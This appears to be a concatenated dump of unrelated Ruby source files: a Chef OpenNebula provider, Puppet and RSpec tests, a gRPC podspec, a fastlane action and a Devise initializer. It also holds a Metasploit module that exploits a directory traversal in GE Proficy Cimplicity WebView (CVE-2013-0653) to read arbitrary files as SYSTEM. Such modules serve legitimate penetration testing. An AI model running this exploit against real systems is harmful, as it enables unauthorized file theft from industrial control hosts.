:datastore_id => new_resource.datastore_id,
:type => new_resource.type || 'OS',
:fs_type => new_resource.fs_type || 'ext2',
:driver => new_resource.img_driver || 'qcow2',
:prefix => new_resource.prefix || 'vd',
:persistent => new_resource.persistent || false)
new_driver.one.chmod_resource(@image, new_resource.mode)
Chef::Log.info("Image '#{new_resource.name}' allocate in initial state #{@image.state_str}")
@new_resource.updated_by_last_action(true)
end
end
@image
end
action :create do
@image = action_allocate
case @image.state_str
when 'INIT', 'LOCKED'
action_handler.perform_action "wait for image '#{new_resource.name}' to be READY" do
current_driver.one.wait_for_img(new_resource.name, @image.id)
@new_resource.updated_by_last_action(true)
end
when 'READY', 'USED', 'USED_PERS'
else
fail "Image #{new_resource.name} is in unexpected state '#{@image.state_str}'"
end
end
action :destroy do
if exists?
action_handler.perform_action "deleted image '#{new_resource.name}'" do
rc = @image.delete
fail "Failed to delete image '#{new_resource.name}' : #{rc.message}" if OpenNebula.is_error?(rc)
until new_driver.one.get_resource(:image, :name => new_resource.name).nil?
Chef::Log.debug("Waiting for delete image to finish...")
sleep 1
end
@new_resource.updated_by_last_action(true)
end
else
action_handler.report_progress "image '#{new_resource.name}' does not exist - (up to date)"
end
end
action :attach do
fail "Missing attribute 'machine_id'" unless new_resource.machine_id
fail "Failed to attach disk - image '#{new_resource.name}' does not exist" unless exists?
vm = new_driver.one.get_resource(:virtualmachine, new_resource.machine_id.is_a?(Integer) ? :id : :name => new_resource.machine_id)
fail "Failed to attach disk - VM '#{new_resource.machine_id}' does not exist" if vm.nil?
action_handler.perform_action "attached disk #{new_resource.name} to #{vm.name}" do
disk_hash = @image.to_hash
disk_tpl = "DISK = [ "
disk_tpl << " IMAGE = #{disk_hash['IMAGE']['NAME']}, IMAGE_UNAME = #{disk_hash['IMAGE']['UNAME']}"
disk_tpl << ", TARGET = #{new_resource.target}" if new_resource.target
disk_tpl << ", DEV_PREFIX = #{new_resource.prefix}" if new_resource.prefix
disk_tpl << ", CACHE = #{new_resource.cache}" if new_resource.cache
disk_tpl << "]"
disk_id = new_driver.one.get_disk_id(vm, disk_hash['IMAGE']['NAME'])
if !disk_id.nil?
action_handler.report_progress "disk is already attached - (up to date)" unless disk_id.nil?
elsif disk_id.nil?
action_handler.report_progress "disk not attached, attaching..."
rc = vm.disk_attach(disk_tpl)
new_driver.one.wait_for_vm(vm.id)
fail "Failed to attach disk to VM '#{vm.name}': #{rc.message}" if OpenNebula.is_error?(rc)
@new_resource.updated_by_last_action(true)
end
end
end
action :snapshot do
fail "Missing attribute 'machine_id'" unless new_resource.machine_id
fail "snapshot '#{new_resource.name}' already exists" if exists?
vm = new_driver.one.get_resource(:virtualmachine, new_resource.machine_id.is_a?(Integer) ? :id : :name => new_resource.machine_id)
fail "Failed to create snapshot - VM '#{new_resource.machine_id}' does not exist" if vm.nil?
action_handler.perform_action "created snapshot from '#{new_resource.machine_id}'" do
disk_id = new_resource.disk_id.is_a?(Integer) ? new_resource.disk_id : new_driver.one.get_disk_id(vm, new_resource.disk_id)
fail "No disk '#{new_resource.disk_id}' found on '#{vm.name}'" if disk_id.nil?
@image = new_driver.one.version_ge_4_14 ? vm.disk_saveas(disk_id, new_resource.name) : vm.disk_snapshot(disk_id, new_resource.name, "", true)
fail "Failed to create snapshot '#{new_resource.name}': #{@image.message}" if OpenNebula.is_error?(@image)
@image = new_driver.one.wait_for_img(new_resource.name, @image)
new_driver.one.chmod_resource(image, new_resource.mode)
if new_resource.persistent
action_handler.report_progress "make image '#{new_resource.name}' persistent"
@image.persistent
end
@new_resource.updated_by_last_action(true)
end
end
action :upload do
fail "'datastore_id' is required" unless new_resource.datastore_id
fail "'image_file' or 'download_url' attribute is required" unless new_resource.image_file || new_resource.download_url
file_url = nil
if new_resource.image_file
fail "image_file #{new_resource.image_file} does not exist" unless ::File.exist? new_resource.image_file
file_url = "http://#{node['ipaddress']}:#{@new_resource.http_port}/#{::File.basename(@new_resource.image_file)}"
else
file_url = new_resource.download_url
end
image_config = {
:name => @new_resource.name,
:datastore_id => @new_resource.datastore_id.to_s,
:path => file_url,
:driver => @new_resource.img_driver || 'qcow2',
:description => @new_resource.description || "#{@new_resource.name} image",
:type => @new_resource.type,
:mode => @new_resource.mode,
:prefix => @new_resource.prefix,
:persistent => @new_resource.persistent,
:public => @new_resource.public,
:target => @new_resource.target,
:disk_type => @new_resource.disk_type,
:source => @new_resource.source,
:size => @new_resource.size,
:fs_type => @new_resource.fs_type
}
if exists?
if @image.name == image_config[:name] &&
@image['PATH'] == image_config[:path] &&
@image['TEMPLATE/DRIVER'] == image_config[:driver] &&
@image['TEMPLATE/DESCRIPTION'] == image_config[:description] &&
@image['DATASTORE_ID'] == image_config[:datastore_id]
action_handler.report_progress("image '#{@new_resource.name}' (ID: #{@image.id}) already exists - (up to date)")
else
fail "image '#{new_resource.name}' already exists, but it is not the same image"
end
else
action_handler.perform_action "upload image '#{@new_resource.name}'" do
if @new_resource.image_file
begin
success = false
pid = nil
trap("CLD") do
cpid = Process.wait
fail "Could not start HTTP server on port #{@new_resource.http_port}" if cpid == pid && !success
end
pid = Process.spawn("python -m SimpleHTTPServer #{@new_resource.http_port}",
:chdir => ::File.dirname(@new_resource.image_file),
STDOUT => "/dev/null",
STDERR => "/dev/null",
:pgroup => true)
new_driver.one.upload_img(image_config)
success = true
@new_resource.updated_by_last_action(true)
ensure
system("sudo kill -9 -#{pid}")
end
else
new_driver.one.upload_img(image_config)
@new_resource.updated_by_last_action(true)
end
end
end
end
action :download do
new_driver = driver
action_handler.perform_action "downloaded image '#{@new_resource.image_file}" do
download_url = ENV['ONE_DOWNLOAD'] || @new_resource.download_url
fail %('download_url' is a required attribute.
You can get the value for 'download_url' by loging into your OpenNebula CLI
and reading the ONE_DOWNLOAD environment variable) if download_url.nil?
# You can get the value for 'download_url' by loging into your OpenNebula CLI and reading the ONE_DOWNLOAD environment variable" if download_url.nil?
image = new_driver.one.get_resource(:image, !@new_resource.image_id.nil? ? { :id => @new_resource.image_id } : { :name => @new_resource.name })
fail "Image 'NAME: #{@new_resource.name}/ID: #{@new_resource.image_id}' does not exist" if image.nil?
local_path = @new_resource.image_file || ::File.join(Chef::Config[:file_cache_path], "#{@new_resource.name}.qcow2")
fail "Will not overwrite an existing file: #{local_path}" if ::File.exist?(local_path)
command = "curl -o #{local_path} #{download_url}/#{::File.basename(::File.dirname(image['SOURCE']))}/#{::File.basename(image['SOURCE'])}"
rc = system(command)
fail rc if rc.nil?
fail "ERROR: #{rc}" unless rc
system("chmod 777 #{local_path}")
Chef::Log.info("Image downloaded from OpenNebula to: #{local_path}")
@new_resource.updated_by_last_action(true)
end
end
protected
def driver
if current_driver && current_driver.driver_url != new_driver.driver_url
fail "Cannot move '#{machine_spec.name}' from #{current_driver.driver_url} to #{new_driver.driver_url}: machine moving is not supported. Destroy and recreate."
end
fail "Driver not specified for one_image #{new_resource.name}" unless new_driver
new_driver
end
def new_driver
run_context.chef_provisioning.driver_for(new_resource.driver)
end
def current_driver
run_context.chef_provisioning.driver_for(run_context.chef_provisioning.current_driver) if run_context.chef_provisioning.current_driver
end
end
end
end
| 46.893855 | 177 | 0.600071 |
91e588a7930a577436b34fabf0b3d806a27e83dd | 597 |
desc 'Set up a dev instance of the Pact Broker'
task 'pact_broker:dev:setup' do
puts "Copying example directory"
FileUtils.cp_r 'example', 'dev'
gemfile_contents = File.read('dev/Gemfile')
puts "Changing source of pact_broker gem from rubygems.org to local file system"
new_gemfile_contents = gemfile_contents.gsub(/^.*gem.*pact_broker.*$/, "gem 'pact_broker', path: '../'")
File.open('dev/Gemfile', "w") { |file| file << new_gemfile_contents }
Dir.chdir("dev") do
Bundler.with_clean_env do
puts "Executing bundle install"
puts `bundle install`
end
end
end
| 29.85 | 106 | 0.700168 |
e9b26b67db968a548df456db2dc01ec5ca7f984d | 2,291 | require "spec_helper"
describe BetterErrors do
context ".editor" do
it "defaults to textmate" do
subject.editor["foo.rb", 123].should == "txmt://open?url=file://foo.rb&line=123"
end
it "url escapes the filename" do
subject.editor["&.rb", 0].should == "txmt://open?url=file://%26.rb&line=0"
end
[:emacs, :emacsclient].each do |editor|
it "uses emacs:// scheme when set to #{editor.inspect}" do
subject.editor = editor
subject.editor[].should start_with "emacs://"
end
end
[:macvim, :mvim].each do |editor|
it "uses mvim:// scheme when set to #{editor.inspect}" do
subject.editor = editor
subject.editor[].should start_with "mvim://"
end
end
[:sublime, :subl, :st].each do |editor|
it "uses subl:// scheme when set to #{editor.inspect}" do
subject.editor = editor
subject.editor[].should start_with "subl://"
end
end
[:textmate, :txmt, :tm].each do |editor|
it "uses txmt:// scheme when set to #{editor.inspect}" do
subject.editor = editor
subject.editor[].should start_with "txmt://"
end
end
["emacsclient", "/usr/local/bin/emacsclient"].each do |editor|
it "uses emacs:// scheme when EDITOR=#{editor}" do
ENV["EDITOR"] = editor
subject.editor = subject.default_editor
subject.editor[].should start_with "emacs://"
end
end
["mvim -f", "/usr/local/bin/mvim -f"].each do |editor|
it "uses mvim:// scheme when EDITOR=#{editor}" do
ENV["EDITOR"] = editor
subject.editor = subject.default_editor
subject.editor[].should start_with "mvim://"
end
end
["subl -w", "/Applications/Sublime Text 2.app/Contents/SharedSupport/bin/subl"].each do |editor|
it "uses mvim:// scheme when EDITOR=#{editor}" do
ENV["EDITOR"] = editor
subject.editor = subject.default_editor
subject.editor[].should start_with "subl://"
end
end
["mate -w", "/usr/bin/mate -w"].each do |editor|
it "uses txmt:// scheme when EDITOR=#{editor}" do
ENV["EDITOR"] = editor
subject.editor = subject.default_editor
subject.editor[].should start_with "txmt://"
end
end
end
end
| 30.959459 | 100 | 0.601048 |
b9288afd8061eb963c8ee4f4eac963e3e096fc9b | 1,654 | # This file has been automatically generated from a template file.
# Please make modifications to
# `templates/gRPC-RxLibrary.podspec.template` instead. This file can be
# regenerated from the template by running
# `tools/buildgen/generate_projects.sh`.
# Copyright 2015 gRPC authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
Pod::Spec.new do |s|
s.name = 'gRPC-RxLibrary'
version = '1.13.0-dev'
s.version = version
s.summary = 'Reactive Extensions library for iOS/OSX.'
s.homepage = 'https://grpc.io'
s.license = 'Apache License, Version 2.0'
s.authors = { 'The gRPC contributors' => '[email protected]' }
s.source = {
:git => 'https://github.com/grpc/grpc.git',
:tag => "v#{version}",
}
s.ios.deployment_target = '7.0'
s.osx.deployment_target = '10.9'
name = 'RxLibrary'
s.module_name = name
s.header_dir = name
src_dir = 'src/objective-c/RxLibrary'
s.source_files = "#{src_dir}/*.{h,m}", "#{src_dir}/**/*.{h,m}"
s.private_header_files = "#{src_dir}/private/*.h"
s.header_mappings_dir = "#{src_dir}"
s.pod_target_xcconfig = {
'CLANG_WARN_STRICT_PROTOTYPES' => 'NO',
}
end
| 31.807692 | 74 | 0.698912 |
f7f9059e7ef9c53a373d3076676118c16993aa63 | 82 | class Salesforce::NewsFeed < Salesforce::SfBase
set_table_name 'news_feeds'
end
| 20.5 | 47 | 0.804878 |
0325a8274bb8e562a11493c7e2e8c67c1f7faedb | 3,897 | ##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'uri'
require 'msf/core'
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::Tcp
include Msf::Auxiliary::Report
def initialize(info = {})
super(update_info(info,
'Name' => 'GE Proficy Cimplicity WebView substitute.bcl Directory Traversal',
'Description' => %q{
This module abuses a directory traversal in GE Proficy Cimplicity, specifically on the
gefebt.exe component used by the WebView, in order to retrieve arbitrary files with SYSTEM
privileges. This module has been tested successfully on GE Proficy Cimplicity 7.5.
},
'Author' =>
[
'Unknown', # Vulnerability discovery
'juan vazquez' # Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2013-0653' ],
[ 'OSVDB', '89490' ],
[ 'BID', '57505' ],
[ 'URL', 'http://ics-cert.us-cert.gov/advisories/ICSA-13-022-02' ]
],
'DisclosureDate' => 'Jan 22 2013'))
register_options(
[
Opt::RPORT(80),
OptString.new('TARGETURI',[true, 'Path to CimWeb', '/CimWeb']),
OptString.new('FILEPATH', [true, 'The name of the file to download', '/windows\\win.ini']),
# By default gefebt.exe installed on C:\Program Files\GE Fanuc\Proficy CIMPLICITY\WebPages\CimWeb
OptInt.new('DEPTH', [true, 'Traversal depth', 5])
], self.class)
end
def normalize_uri(*strs)
new_str = strs * "/"
new_str = new_str.gsub!("//", "/") while new_str.index("//")
# Makes sure there's a starting slash
unless new_str[0,1] == '/'
new_str = '/' + new_str
end
new_str
end
def target_uri
begin
# In case TARGETURI is empty, at least we default to '/'
u = datastore['TARGETURI']
u = "/" if u.nil? or u.empty?
URI(u)
rescue ::URI::InvalidURIError
print_error "Invalid URI: #{datastore['TARGETURI'].inspect}"
raise Msf::OptionValidateError.new(['TARGETURI'])
end
end
def my_basename(filename)
return ::File.basename(filename.gsub(/\\/, "/"))
end
def is_proficy?
connect
req = "GET #{normalize_uri(target_uri.path, "index.html")} HTTP/1.0\r\n\r\n"
sock.put(req)
res = sock.get_once
disconnect
if res and res =~ /gefebt\.exe/
return true
else
return false
end
end
# We can't use the http client msf mixin because the Proficy Web server
# return a malformed HTTP response with the file contents, there aren't
# two new lines (but one) between the HTTP headers and the body content.
def read_file(file)
travs = ""
travs << "../" * datastore['DEPTH']
travs << file
print_status("#{@peer} - Retrieving file contents...")
connect
req = "GET #{normalize_uri(target_uri.path, "gefebt.exe")}?substitute.bcl+FILE=#{travs} HTTP/1.0\r\n\r\n"
sock.put(req)
res = sock.get_once
disconnect
if res and res =~ /HTTP\/1\.0 200 OK/
return res
else
return nil
end
end
def run
@peer = "#{rhost}:#{rport}"
print_status("#{@peer} - Checking if it's a GE Proficy Application...")
if is_proficy?
print_good("#{@peer} - Check successful")
else
print_error("#{@peer} - GE proficy not found")
return
end
contents = read_file(datastore['FILEPATH'])
if contents.nil?
print_error("#{@peer} - File not downloaded")
return
end
file_name = my_basename(datastore['FILEPATH'])
path = store_loot(
'ge.proficy.traversal',
'application/octet-stream',
rhost,
contents,
file_name
)
print_good("#{rhost}:#{rport} - File saved in: #{path}")
end
end
| 27.0625 | 110 | 0.606107 |
ac819bd29fbfaa81fcdee03bd54c5065b5ab60ee | 5,851 | require 'spec_helper'
describe 'sudo' do
context 'with class default options' do
it do
should contain_package('sudo-package').with({
'ensure' => 'present',
'name' => 'sudo',
})
should contain_file('/etc/sudoers.d').with({
'ensure' => 'present',
'owner' => 'root',
'group' => 'root',
'mode' => '0750',
'recurse' => 'true',
'purge' => 'true',
})
should contain_file('/etc/sudoers').with({
'owner' => 'root',
'group' => 'root',
'mode' => '0440',
})
end
end
context 'with all options set and manage all resources' do
let(:params) { {:package => 'package',
:package_ensure => 'absent',
:package_source => '/file',
:package_adminfile => '/adminfile',
:package_manage => 'true',
:config_dir => '/folder',
:config_dir_ensure => 'absent',
:config_dir_mode => '0550',
:config_dir_group => 'bar',
:config_dir_purge => 'false',
:sudoers_manage => 'true',
:sudoers => { 'root' => { 'content' => 'root ALL=(ALL) ALL' }, 'webusers' => { 'priority' => '20', 'source' => 'puppet:///files/webusers' } },
:config_file => '/sudoers/file',
:config_file_group => 'group',
:config_file_owner => 'owner',
:config_file_mode => '1555',
} }
it do
should contain_package('sudo-package').with({
'ensure' => 'absent',
'name' => 'package',
'source' => '/file',
'adminfile' => '/adminfile',
})
should contain_file('/folder').with({
'ensure' => 'absent',
'owner' => 'root',
'group' => 'bar',
'mode' => '0550',
'recurse' => 'false',
'purge' => 'false',
})
should contain_file('10_root').with({
'ensure' => 'present',
'path' => '/folder/10_root',
'owner' => 'root',
'group' => 'bar',
'mode' => '0440',
'content' => 'root ALL=(ALL) ALL',
})
should contain_file('20_webusers').with({
'ensure' => 'present',
'path' => '/folder/20_webusers',
'owner' => 'root',
'group' => 'bar',
'mode' => '0440',
'source' => 'puppet:///files/webusers',
})
should contain_file('/sudoers/file').with({
'owner' => 'owner',
'group' => 'group',
'mode' => '1555',
})
end
end
context 'with default options and package_manage false' do
let(:params) { {:package_manage => 'false' } }
it do
should contain_file('/etc/sudoers.d').with({
'ensure' => 'present',
'owner' => 'root',
'group' => 'root',
'mode' => '0750',
'recurse' => 'true',
'purge' => 'true',
})
should contain_file('/etc/sudoers').with({
'owner' => 'root',
'group' => 'root',
'mode' => '0440',
})
should_not contain_package('sudo-package')
end
end
context 'with default options and sudoers_manage false' do
let(:params) { {:sudoers_manage => 'false' } }
it do
should contain_package('sudo-package').with({
'ensure' => 'present',
'name' => 'sudo',
})
should_not contain_file('/etc/sudoers.d')
should_not contain_file('/etc/sudoers')
end
end
context 'with sudoers_manage and package_manage false and with sudoers hash' do
let(:params) { {:sudoers => { 'root' => { 'content' => 'root ALL=(ALL) ALL' }, 'webusers' => { 'priority' => '20', 'source' => 'puppet:///files/webusers' } },
:sudoers_manage => 'false',
:package_manage => 'false',
} }
it do
should_not contain_package('sudo-package')
should_not contain_file('/etc/sudoers.d')
should_not contain_file('/etc/sudoers')
should_not contain_file('10_root')
should_not contain_file('20_webusers')
end
end
context 'with specifying package_manage param set to invalid value' do
let(:params) { {:package_manage => [ true ] } }
it do
expect { should }.to raise_error(Puppet::Error,/is not a boolean/)
end
end
context 'with specifying sudoers_manage param set to invalid value' do
let(:params) { {:sudoers_manage => 'foo' } }
it do
expect { should }.to raise_error(Puppet::Error,/Unknown type/)
end
end
context 'with specifying config_dir_purge set to invalid value' do
let(:params) { {:config_dir_purge => 'invalid' } }
it do
expect { should }.to raise_error(Puppet::Error,/Unknown type/)
end
end
context 'with specifying config_dir set to invalid value' do
let(:params) { {:config_dir => 'invalidpath' } }
it do
expect { should }.to raise_error(Puppet::Error,/is not an absolute path/)
end
end
context 'with specifying config_file param set to invalid value' do
let(:params) { {:config_file => 'invalidpath' } }
it do
expect { should }.to raise_error(Puppet::Error,/is not an absolute path/)
end
end
context 'with specifying adminfile param set to invalid value' do
let(:params) { {:package_adminfile => 'invalidpath' } }
it do
expect { should }.to raise_error(Puppet::Error,/is not an absolute path/)
end
end
context 'with specifying sudoers hash set to invalid value' do
let(:params) { {:sudoers => [ "not_a_hash" ] } }
it do
expect { should }.to raise_error(Puppet::Error,/is not a Hash/)
end
end
end
| 34.017442 | 172 | 0.519398 |
bf28b738af2eb9e1fff72cd95bfb7c9d6ab6e5c5 | 433 | module GeoPattern
class ColorPreset
attr_accessor :color, :base_color, :mode
def initialize(color: nil, base_color: nil)
@color = color
@base_color = base_color
end
# Return mode
#
# @return [Symbol]
# The color mode
def mode
if color.nil? || color.empty?
:base_color
else
:color
end
end
def mode?(m)
mode == m
end
end
end
| 16.037037 | 47 | 0.551963 |
1d27b507a7c2368f9d3b8190a88d531055602336 | 2,268 | module Fastlane
module Actions
class GitPullAction < Action
def self.run(params)
commands = []
unless params[:only_tags]
command = "git pull"
command << " --rebase" if params[:rebase]
commands += ["#{command} &&"]
end
commands += ["git fetch --tags"]
Actions.sh(commands.join(' '))
end
def self.description
"Executes a simple git pull command"
end
def self.available_options
[
FastlaneCore::ConfigItem.new(key: :only_tags,
description: "Simply pull the tags, and not bring new commits to the current branch from the remote",
is_string: false,
optional: true,
default_value: false,
verify_block: proc do |value|
UI.user_error!("Please pass a valid value for only_tags. Use one of the following: true, false") unless value.kind_of?(TrueClass) || value.kind_of?(FalseClass)
end),
FastlaneCore::ConfigItem.new(key: :rebase,
description: "Rebase on top of the remote branch instead of merge",
is_string: false,
optional: true,
default_value: false,
verify_block: proc do |value|
UI.user_error!("Please pass a valid value for rebase. Use one of the following: true, false") unless value.kind_of?(TrueClass) || value.kind_of?(FalseClass)
end)
]
end
def self.authors
["KrauseFx", "JaviSoto"]
end
def self.is_supported?(platform)
true
end
def self.example_code
[
'git_pull',
'git_pull(only_tags: true) # only the tags, no commits',
'git_pull(rebase: true) # use --rebase with pull'
]
end
def self.category
:source_control
end
end
end
end
| 34.892308 | 200 | 0.474868 |
bb08d6b6c1471df75bd7a32c0421005c5fdd8fef | 423 | module EmergencyBanner
class Deploy
def run(campaign_class, heading, short_description = "", link = "", link_text = "")
redis = Redis.new
redis.hmset(:emergency_banner,
:campaign_class, campaign_class,
:heading, heading,
:short_description, short_description,
:link, link,
:link_text, link_text,)
end
end
end
| 30.214286 | 87 | 0.565012 |
f78425dd3fbbc4447d9c43de5efeb30685eeadab | 14,457 | # frozen_string_literal: true
# Use this hook to configure devise mailer, warden hooks and so forth.
# Many of these configuration options can be set straight in your model.
Devise.setup do |config|
# The secret key used by Devise. Devise uses this key to generate
# random tokens. Changing this key will render invalid all existing
# confirmation, reset password and unlock tokens in the database.
# Devise will use the `secret_key_base` as its `secret_key`
# by default. You can change it below and use your own secret key.
# config.secret_key = '2d407124742c65bc392cd5f7a61b3b71a8efd6d08b6827c8d68bc2615e5eed44bdb1a633e0474582225322c3abc5490e3464be836e0d85bce7d4bcee15144a9f'
# ==> Controller configuration
# Configure the parent class to the devise controllers.
# config.parent_controller = 'DeviseController'
# ==> Mailer Configuration
# Configure the e-mail address which will be shown in Devise::Mailer,
# note that it will be overwritten if you use your own mailer class
# with default "from" parameter.
config.mailer_sender = '[email protected]'
# Configure the class responsible to send e-mails.
# config.mailer = 'Devise::Mailer'
# Configure the parent class responsible to send e-mails.
# config.parent_mailer = 'ActionMailer::Base'
# ==> ORM configuration
# Load and configure the ORM. Supports :active_record (default) and
# :mongoid (bson_ext recommended) by default. Other ORMs may be
# available as additional gems.
require 'devise/orm/active_record'
# ==> Configuration for any authentication mechanism
# Configure which keys are used when authenticating a user. The default is
# just :email. You can configure it to use [:username, :subdomain], so for
# authenticating a user, both parameters are required. Remember that those
# parameters are used only when authenticating and not when retrieving from
# session. If you need permissions, you should implement that in a before filter.
# You can also supply a hash where the value is a boolean determining whether
# or not authentication should be aborted when the value is not present.
# config.authentication_keys = [:email]
# Configure parameters from the request object used for authentication. Each entry
# given should be a request method and it will automatically be passed to the
# find_for_authentication method and considered in your model lookup. For instance,
# if you set :request_keys to [:subdomain], :subdomain will be used on authentication.
# The same considerations mentioned for authentication_keys also apply to request_keys.
# config.request_keys = []
# Configure which authentication keys should be case-insensitive.
# These keys will be downcased upon creating or modifying a user and when used
# to authenticate or find a user. Default is :email.
config.case_insensitive_keys = [:email]
# Configure which authentication keys should have whitespace stripped.
# These keys will have whitespace before and after removed upon creating or
# modifying a user and when used to authenticate or find a user. Default is :email.
config.strip_whitespace_keys = [:email]
# Tell if authentication through request.params is enabled. True by default.
# It can be set to an array that will enable params authentication only for the
# given strategies, for example, `config.params_authenticatable = [:database]` will
# enable it only for database (email + password) authentication.
# config.params_authenticatable = true
# Tell if authentication through HTTP Auth is enabled. False by default.
# It can be set to an array that will enable http authentication only for the
# given strategies, for example, `config.http_authenticatable = [:database]` will
# enable it only for database authentication. The supported strategies are:
# :database = Support basic authentication with authentication key + password
# config.http_authenticatable = false
# If 401 status code should be returned for AJAX requests. True by default.
# config.http_authenticatable_on_xhr = true
# The realm used in Http Basic Authentication. 'Application' by default.
# config.http_authentication_realm = 'Application'
# It will change confirmation, password recovery and other workflows
# to behave the same regardless if the e-mail provided was right or wrong.
# Does not affect registerable.
# config.paranoid = true
# By default Devise will store the user in session. You can skip storage for
# particular strategies by setting this option.
# Notice that if you are skipping storage for all authentication paths, you
# may want to disable generating routes to Devise's sessions controller by
# passing skip: :sessions to `devise_for` in your config/routes.rb
config.skip_session_storage = [:http_auth]
# By default, Devise cleans up the CSRF token on authentication to
# avoid CSRF token fixation attacks. This means that, when using AJAX
# requests for sign in and sign up, you need to get a new CSRF token
# from the server. You can disable this option at your own risk.
# config.clean_up_csrf_token_on_authentication = true
# When false, Devise will not attempt to reload routes on eager load.
# This can reduce the time taken to boot the app but if your application
# requires the Devise mappings to be loaded during boot time the application
# won't boot properly.
# config.reload_routes = true
# ==> Configuration for :database_authenticatable
# For bcrypt, this is the cost for hashing the password and defaults to 11. If
# using other algorithms, it sets how many times you want the password to be hashed.
#
# Limiting the stretches to just one in testing will increase the performance of
# your test suite dramatically. However, it is STRONGLY RECOMMENDED to not use
# a value less than 10 in other environments. Note that, for bcrypt (the default
# algorithm), the cost increases exponentially with the number of stretches (e.g.
# a value of 20 is already extremely slow: approx. 60 seconds for 1 calculation).
config.stretches = Rails.env.test? ? 1 : 11
# Set up a pepper to generate the hashed password.
# config.pepper = '553b9bef15ed285e6a93aced514b447d8577c26dde669179cbda32bf4eb7904fae8cea0c9216989f40b10140eda564c48feefa28ff660b56ec8a3ce0dfa3e448'
# Send a notification to the original email when the user's email is changed.
# config.send_email_changed_notification = false
# Send a notification email when the user's password is changed.
# config.send_password_change_notification = false
# ==> Configuration for :confirmable
# A period that the user is allowed to access the website even without
# confirming their account. For instance, if set to 2.days, the user will be
# able to access the website for two days without confirming their account,
# access will be blocked just in the third day.
# You can also set it to nil, which will allow the user to access the website
# without confirming their account.
# Default is 0.days, meaning the user cannot access the website without
# confirming their account.
# config.allow_unconfirmed_access_for = 2.days
# A period that the user is allowed to confirm their account before their
# token becomes invalid. For example, if set to 3.days, the user can confirm
# their account within 3 days after the mail was sent, but on the fourth day
# their account can't be confirmed with the token any more.
# Default is nil, meaning there is no restriction on how long a user can take
# before confirming their account.
# config.confirm_within = 3.days
# If true, requires any email changes to be confirmed (exactly the same way as
# initial account confirmation) to be applied. Requires additional unconfirmed_email
# db field (see migrations). Until confirmed, new email is stored in
# unconfirmed_email column, and copied to email column on successful confirmation.
config.reconfirmable = true
# Defines which key will be used when confirming an account
# config.confirmation_keys = [:email]
# ==> Configuration for :rememberable
# The time the user will be remembered without asking for credentials again.
# config.remember_for = 2.weeks
# Invalidates all the remember me tokens when the user signs out.
config.expire_all_remember_me_on_sign_out = true
# If true, extends the user's remember period when remembered via cookie.
# config.extend_remember_period = false
# Options to be passed to the created cookie. For instance, you can set
# secure: true in order to force SSL only cookies.
# config.rememberable_options = {}
# ==> Configuration for :validatable
# Range for password length.
config.password_length = 6..128
# Email regex used to validate email formats. It simply asserts that
# one (and only one) @ exists in the given string. This is mainly
# to give user feedback and not to assert the e-mail validity.
config.email_regexp = /\A[^@\s]+@[^@\s]+\z/
# ==> Configuration for :timeoutable
# The time you want to timeout the user session without activity. After this
# time the user will be asked for credentials again. Default is 30 minutes.
# config.timeout_in = 30.minutes
# ==> Configuration for :lockable
# Defines which strategy will be used to lock an account.
# :failed_attempts = Locks an account after a number of failed attempts to sign in.
# :none = No lock strategy. You should handle locking by yourself.
# config.lock_strategy = :failed_attempts
# Defines which key will be used when locking and unlocking an account
# config.unlock_keys = [:email]
# Defines which strategy will be used to unlock an account.
# :email = Sends an unlock link to the user email
# :time = Re-enables login after a certain amount of time (see :unlock_in below)
# :both = Enables both strategies
# :none = No unlock strategy. You should handle unlocking by yourself.
# config.unlock_strategy = :both
# Number of authentication tries before locking an account if lock_strategy
# is failed attempts.
# config.maximum_attempts = 20
# Time interval to unlock the account if :time is enabled as unlock_strategy.
# config.unlock_in = 1.hour
# Warn on the last attempt before the account is locked.
# config.last_attempt_warning = true
# ==> Configuration for :recoverable
#
# Defines which key will be used when recovering the password for an account
# config.reset_password_keys = [:email]
# Time interval you can reset your password with a reset password key.
# Don't put a too small interval or your users won't have the time to
# change their passwords.
config.reset_password_within = 6.hours
# When set to false, does not sign a user in automatically after their password is
# reset. Defaults to true, so a user is signed in automatically after a reset.
# config.sign_in_after_reset_password = true
# ==> Configuration for :encryptable
# Allow you to use another hashing or encryption algorithm besides bcrypt (default).
# You can use :sha1, :sha512 or algorithms from others authentication tools as
# :clearance_sha1, :authlogic_sha512 (then you should set stretches above to 20
# for default behavior) and :restful_authentication_sha1 (then you should set
# stretches to 10, and copy REST_AUTH_SITE_KEY to pepper).
#
# Require the `devise-encryptable` gem when using anything other than bcrypt
# config.encryptor = :sha512
# ==> Scopes configuration
# Turn scoped views on. Before rendering "sessions/new", it will first check for
# "users/sessions/new". It's turned off by default because it's slower if you
# are using only default views.
# config.scoped_views = false
# Configure the default scope given to Warden. By default it's the first
# devise role declared in your routes (usually :user).
# config.default_scope = :user
# Set this configuration to false if you want /users/sign_out to sign out
# only the current scope. By default, Devise signs out all scopes.
# config.sign_out_all_scopes = true
# ==> Navigation configuration
# Lists the formats that should be treated as navigational. Formats like
# :html, should redirect to the sign in page when the user does not have
# access, but formats like :xml or :json, should return 401.
#
# If you have any extra navigational formats, like :iphone or :mobile, you
# should add them to the navigational formats lists.
#
# The "*/*" below is required to match Internet Explorer requests.
# config.navigational_formats = ['*/*', :html]
# The default HTTP method used to sign out a resource. Default is :delete.
config.sign_out_via = :delete
# ==> OmniAuth
# Add a new OmniAuth provider. Check the wiki for more information on setting
# up on your models and hooks.
# config.omniauth :github, 'APP_ID', 'APP_SECRET', scope: 'user,public_repo'
# ==> Warden configuration
# If you want to use other strategies, that are not supported by Devise, or
# change the failure app, you can configure them inside the config.warden block.
#
# config.warden do |manager|
# manager.intercept_401 = false
# manager.default_strategies(scope: :user).unshift :some_external_strategy
# end
# ==> Mountable engine configurations
# When using Devise inside an engine, let's call it `MyEngine`, and this engine
# is mountable, there are some extra configurations to be taken into account.
# The following options are available, assuming the engine is mounted as:
#
# mount MyEngine, at: '/my_engine'
#
# The router that invoked `devise_for`, in the example above, would be:
# config.router_name = :my_engine
#
# When using OmniAuth, Devise cannot automatically set OmniAuth path,
